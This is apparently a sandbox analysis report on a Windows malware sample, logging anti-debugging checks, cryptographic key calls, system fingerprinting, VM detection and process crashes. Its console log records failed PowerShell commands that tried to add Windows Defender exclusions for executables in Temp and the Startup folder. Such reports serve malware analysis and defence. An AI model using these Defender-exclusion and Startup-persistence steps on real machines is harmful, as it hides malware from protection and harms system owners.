IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:58 p.m.			0	0

Command line console output was observed (50 out of 416 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\File console_handle: 0x00000053	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: .exe -Force console_handle: 0x0000005f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\File console_handle: 0x00000053	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: .exe -Force console_handle: 0x0000005f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Roaming\Microso console_handle: 0x00000053	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: ft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe console_handle: 0x0000005f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: -Force console_handle: 0x0000006b	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x00000077	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: mmandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000008f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Roaming\Microso console_handle: 0x00000053	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: ft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe console_handle: 0x0000005f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: -Force console_handle: 0x0000006b	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x00000077	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: mmandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000008f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\File console_handle: 0x00000053	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: .exe -Force console_handle: 0x0000005f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW June 21, 2021, 12:57 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 2045 events)

Time & API	Arguments	Status	Return
CryptExportKey June 21, 2021, 12:56 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004d1408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:56 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004d1448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:56 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004d1448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fae20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fae20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fae20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fae20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fae20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fae20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa9a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa9a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa9a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002faae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002fa6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 12:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0034e6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (8 events)

registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Registration\{191301D3-A579-428C-B0C7-D7988500F9E3}\DigitalProductID
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Registration\{6F327760-8C5C-417C-9B61-836A98287E0C}\DigitalProductID
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Registration\{FDF3ECB9-B56F-43B2-A9B8-1B48B6BAE1A7}\DigitalProductID
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Registration\DigitalProductId
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Registration\{90140000-0011-0000-1000-0000000FF1CE}\DigitalProductID
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 21, 2021, 12:56 p.m.		1	1	0

One or more processes crashed (42 events)

Time & API	Arguments	Status
__exception__ June 21, 2021, 12:56 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1 system+0x7fec04 @ 0x659eec04 system+0x1a5c90 @ 0x65395c90 system+0x1a5b5c @ 0x65395b5c system+0x1914c7 @ 0x653814c7 system+0x1c3126 @ 0x653b3126 system+0x1c31d9 @ 0x653b31d9 0x6204b6 0x6200f4 0x6200b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3927704 registers.edi: 0 registers.eax: 3927704 registers.ebp: 3927784 registers.edx: 0 registers.ebx: 5344688 registers.esi: 4609784 registers.ecx: 2102489024	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0x6271be 0x6266b9 0x626249 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x620234 0x6200b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 b2 3e 83 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x62722b registers.esp: 3923332 registers.edi: 3923352 registers.eax: 0 registers.ebp: 3923364 registers.edx: 35263016 registers.ebx: 3923664 registers.esi: 35263016 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0x6271d0 0x6266b9 0x626249 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x620234 0x6200b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 